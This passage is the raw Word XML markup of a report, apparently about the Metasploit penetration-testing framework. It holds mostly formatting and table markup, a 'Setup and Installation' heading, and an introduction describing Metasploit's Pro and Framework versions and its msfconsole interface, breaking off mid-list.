          <w:p w:rsidR="00E83055" w:rsidRPr="005A3471" w:rsidRDefault="00E83055" w:rsidP="00C54AED">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b w:val="0"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A11325">
              <w:rPr>
                <w:b w:val="0"/>
              </w:rPr>
              <w:t>Comprehensive Report</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E83055" w:rsidRPr="008C4012" w:rsidTr="00E83055">
        <w:trPr>
          <w:trHeight w:val="354"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="1589" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00E83055" w:rsidRPr="00A11325" w:rsidRDefault="00E83055" w:rsidP="00A11325">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b w:val="0"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A11325">
              <w:rPr>
                <w:b w:val="0"/>
              </w:rPr>
              <w:t>5.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="000100000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="1" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="6968" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00E83055" w:rsidRPr="00A11325" w:rsidRDefault="00E83055" w:rsidP="00C54AED">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b w:val="0"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A11325">
              <w:rPr>
                <w:b w:val="0"/>
              </w:rPr>
              <w:t>Presentation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E83055" w:rsidRPr="008C4012" w:rsidTr="00E830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589" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00E83055" w:rsidRPr="008C4012" w:rsidRDefault="00E83055" w:rsidP="00A11325">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="000100000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="1" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="6968" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00E83055" w:rsidRPr="00BC396B" w:rsidRDefault="00E83055" w:rsidP="00BC396B">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E83055" w:rsidRPr="008C4012" w:rsidTr="00E83055">
        <w:trPr>
          <w:trHeight w:val="354"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="1589" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00E83055" w:rsidRPr="008C4012" w:rsidRDefault="00E83055" w:rsidP="00A11325">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="000100000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="1" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="6968" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00E83055" w:rsidRPr="008C4012" w:rsidRDefault="00E83055" w:rsidP="00C54AED">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E83055" w:rsidRPr="008C4012" w:rsidTr="00E83055">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589" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00E83055" w:rsidRPr="008C4012" w:rsidRDefault="00E83055" w:rsidP="00A11325">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="000100000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="1" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="6968" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00E83055" w:rsidRPr="008C4012" w:rsidRDefault="00E83055" w:rsidP="00C54AED">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E83055" w:rsidRPr="008C4012" w:rsidTr="00E83055">
        <w:trPr>
          <w:trHeight w:val="365"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="1589" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00E83055" w:rsidRPr="008C4012" w:rsidRDefault="00E83055" w:rsidP="00A11325">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="000100000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="1" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="6968" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00E83055" w:rsidRPr="008C4012" w:rsidRDefault="00E83055" w:rsidP="00C54AED">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E83055" w:rsidRPr="008C4012" w:rsidTr="00E83055">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589" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00E83055" w:rsidRPr="008C4012" w:rsidRDefault="00E83055" w:rsidP="00A11325">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="000100000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="1" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="6968" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00E83055" w:rsidRPr="008C4012" w:rsidRDefault="00E83055" w:rsidP="00A8573A">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E83055" w:rsidRPr="008C4012" w:rsidTr="00E83055">
        <w:trPr>
          <w:trHeight w:val="354"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="1589" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00E83055" w:rsidRDefault="00E83055" w:rsidP="00A11325">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="000100000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="1" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="6968" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00E83055" w:rsidRPr="008C4012" w:rsidRDefault="00E83055" w:rsidP="00C54AED">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="7740"/>
              </w:tabs>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E83055" w:rsidRPr="008C4012" w:rsidTr="00E83055">
        <w:trPr>
          <w:cnfStyle w:val="010000000000" w:firstRow="0" w:lastRow="1"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1589" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00E83055" w:rsidRPr="008C4012" w:rsidRDefault="00E83055" w:rsidP="00A11325">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="000100000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="1" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="6968" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00E83055" w:rsidRPr="008C4012" w:rsidRDefault="00E83055" w:rsidP="00C54AED">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00942CC1" w:rsidRPr="008C4012" w:rsidRDefault="00942CC1" w:rsidP="00942CC1">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E8513F" w:rsidRDefault="00C54AED" w:rsidP="00E8513F">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="7740"/>
        </w:tabs>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E83055" w:rsidRPr="00E83055" w:rsidRDefault="00E83055" w:rsidP="00E83055">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>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7740"/>
        </w:tabs>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E83055">
        <w:rPr>
          <w:b/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Setup and Installation:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00725829" w:rsidRDefault="0083099E" w:rsidP="00725829">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="7740"/>
        </w:tabs>
        <w:ind w:left="456"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251661312" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="719D4214" wp14:editId="38FCEE87">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>1691640</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="margin">
              <wp:posOffset>510540</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1981200" cy="19812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eta"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId10">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anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="001C3B24" w:rsidRDefault="001C3B24" w:rsidP="00725829">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="7740"/>
        </w:tabs>
        <w:ind w:left="456"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0083099E" w:rsidRDefault="0083099E" w:rsidP="00725829">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="7740"/>
        </w:tabs>
        <w:ind w:left="456"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0083099E" w:rsidRDefault="0083099E" w:rsidP="00725829">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="7740"/>
        </w:tabs>
        <w:ind w:left="456"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0083099E" w:rsidRDefault="0083099E" w:rsidP="00725829">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="7740"/>
        </w:tabs>
        <w:ind w:left="456"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0083099E" w:rsidRDefault="0083099E" w:rsidP="00725829">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="7740"/>
        </w:tabs>
        <w:ind w:left="456"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0083099E" w:rsidRDefault="0083099E" w:rsidP="00725829">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="7740"/>
        </w:tabs>
        <w:ind w:left="456"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0083099E" w:rsidRDefault="0083099E" w:rsidP="00725829">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="7740"/>
        </w:tabs>
        <w:ind w:left="456"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00725829" w:rsidRPr="00725829" w:rsidRDefault="00725829" w:rsidP="00725829">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="7740"/>
        </w:tabs>
        <w:ind w:left="456"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Introduction:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A9440F" w:rsidRPr="00F50DF5" w:rsidRDefault="00A9440F" w:rsidP="00A9440F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="7740"/>
        </w:tabs>
        <w:ind w:left="456"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F50DF5">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Metasploit is the most widely used exploitation framework. Metasploit is a powerful tool that can support all phases of a penetration testing engagement, from information gathering to post-exploitation.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A9440F" w:rsidRPr="00A9440F" w:rsidRDefault="00A9440F" w:rsidP="00A9440F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="7740"/>
        </w:tabs>
        <w:ind w:left="456"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A9440F" w:rsidRPr="00A9440F" w:rsidRDefault="00A9440F" w:rsidP="00A9440F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="7740"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F50DF5">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Metasploit has two main versions</w:t>
      </w:r>
      <w:r w:rsidRPr="00A9440F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A9440F" w:rsidRPr="00A9440F" w:rsidRDefault="00A9440F" w:rsidP="00A9440F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="7740"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A9440F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Metasploit Pro:</w:t>
      </w:r>
      <w:r w:rsidRPr="00A9440F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F50DF5">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>The commercial version that facilitates the automation and management of tasks. This version has a graphical user interface (GUI).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A9440F" w:rsidRPr="00F50DF5" w:rsidRDefault="00A9440F" w:rsidP="00A9440F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="7740"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A9440F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Metasploit Framework</w:t>
      </w:r>
      <w:r w:rsidRPr="00F50DF5">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">: The open-source version that works from the command line. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A9440F" w:rsidRPr="00A9440F" w:rsidRDefault="00A9440F" w:rsidP="00A9440F">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="7740"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F50DF5">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>The Metasploit Framework is a set of tools that allow information gathering, scanning, exploitation, exploit development, post-exploitation, and more. While the primary usage of the Metasploit Framework focuses on the penetration testing domain, it is also useful for vulnerability research and exploit development</w:t>
      </w:r>
      <w:r w:rsidRPr="00A9440F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A9440F" w:rsidRPr="00A9440F" w:rsidRDefault="00A9440F" w:rsidP="00A9440F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="7740"/>
        </w:tabs>
        <w:ind w:left="456"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A9440F" w:rsidRPr="00F50DF5" w:rsidRDefault="00A9440F" w:rsidP="00725829">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="7740"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F50DF5">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>The main components of the Metasploit Framewo</w:t>
      </w:r>
      <w:r w:rsidR="00F50DF5">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>rk can be summarized as follows:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A9440F" w:rsidRPr="00A9440F" w:rsidRDefault="00A9440F" w:rsidP="00A9440F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="7740"/>
        </w:tabs>
        <w:ind w:left="456"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A9440F" w:rsidRPr="00A9440F" w:rsidRDefault="00A9440F" w:rsidP="00725829">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="7740"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00725829">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>msfconsole:</w:t>
      </w:r>
      <w:r w:rsidRPr="00A9440F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F50DF5">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>The main command-line interface</w:t>
      </w:r>
      <w:r w:rsidRPr="00A9440F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D875A0" w:rsidRPr="00D875A0" w:rsidRDefault="00A9440F" w:rsidP="00D875A0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="7740"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00725829">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
